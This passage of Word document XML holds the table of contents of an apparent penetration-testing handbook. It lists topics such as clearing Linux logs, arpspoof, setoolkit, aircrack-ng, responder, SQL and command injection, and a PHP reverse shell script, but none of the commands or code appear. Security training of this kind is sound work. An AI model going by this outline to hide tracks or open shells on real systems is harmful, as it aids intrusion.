          <w:p w14:paraId="2D587071" w14:textId="00FC3948" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>clearing system logs (Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="7F2665C1" w14:textId="77777777" w:rsidTr="00B3003B">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6AFF2EEC" w14:textId="1355D9D4" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161-189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5AB8106A" w14:textId="1913C456" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="625A95F0" w14:textId="46BFD113" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Testing, DoS and Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4836F373" w14:textId="5EDF319E" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>hping3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="78D71F19" w14:textId="77777777" w:rsidTr="00B174AB">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ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7AC668F7" w14:textId="63493D42" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161-189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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28B5D7B3" w14:textId="4CB86B3D" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>162</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827"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6320AD31" w14:textId="29192198" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Testing, DoS and Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="77A10F5B" w14:textId="7F7958C8" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Ghidra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="32A4B7EE" w14:textId="77777777" w:rsidTr="00D47DD4">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ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="78129553" w14:textId="406E06DB" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161-189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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7BF7892F" w14:textId="6E8DE473" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827"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6256CFFA" w14:textId="41A6595C" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Testing, DoS and Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3775860F" w14:textId="7A6EEF4C" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>arpspoof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="4B73DB7D" w14:textId="77777777" w:rsidTr="007D2F33">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ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5857C878" w14:textId="67A54F04" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161-189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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3AB2793D" w14:textId="04DAF933" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>164</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827"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6BE1E43C" w14:textId="441B8E55" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Testing, DoS and Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="53FDD226" w14:textId="54978197" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>setoolkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="4A861E51" w14:textId="77777777" w:rsidTr="00F86ADC">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6182CB89" w14:textId="688CB9BB" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161-189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276"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71C72075" w14:textId="443EE08E" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>165</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7F351299" w14:textId="7CC666D3" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Testing, DoS and Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="32177F94" w14:textId="550AE458" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>aircrack-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="2CFAC2B0" w14:textId="77777777" w:rsidTr="00B3003B">
        <w:trPr>
          <w:trHeight w:val="231"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="ACB9CA" w:themeFill="text2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="33132BA6" w14:textId="35AC8064" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>161-189</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="017E613D" w14:textId="54549A07" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="68652425" w14:textId="1FE9D43E" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Testing, DoS and Miscellaneous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5DCE4" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0B28881F" w14:textId="23B3DE11" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="333FA56F" w14:textId="77777777" w:rsidTr="00767461">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FDE87A3" w14:textId="2A6A52E7" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57064610" w14:textId="32A6E972" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26BAC974" w14:textId="6C33828E" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scripts and Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66CF215C" w14:textId="038879F0" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="2160"/>
                <w:tab w:val="right" w:pos="4320"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>SQL Injection Commands</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="5BB11CD6" w14:textId="77777777" w:rsidTr="003F5A14">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CA3520B" w14:textId="1C3302C1" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="208F5B98" w14:textId="0D1ABED8" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36B9A9C4" w14:textId="5E98FD2C" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scripts and Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BB28BFD" w14:textId="31A14048" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="2160"/>
                <w:tab w:val="right" w:pos="4320"/>
              </w:tabs>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="6D7651DC" w14:textId="77777777" w:rsidTr="00C831BD">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24C05281" w14:textId="27981777" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0129D4F7" w14:textId="0B8B869A" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CDBC0C0" w14:textId="21D70822" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scripts and Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="557E685B" w14:textId="54E98D58" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>PHP Reverse Shell Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="0490B662" w14:textId="77777777" w:rsidTr="00767461">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="681BF268" w14:textId="1353FBD2" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DEEE942" w14:textId="030C04BE" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="132F6C5B" w14:textId="657212A8" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scripts and Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D5C9A1B" w14:textId="4DA278C5" w:rsidR="00C84DDE" w:rsidRPr="001E0F42" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>OS Fingerprinting with TTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="0250A0DE" w14:textId="77777777" w:rsidTr="003F50AF">
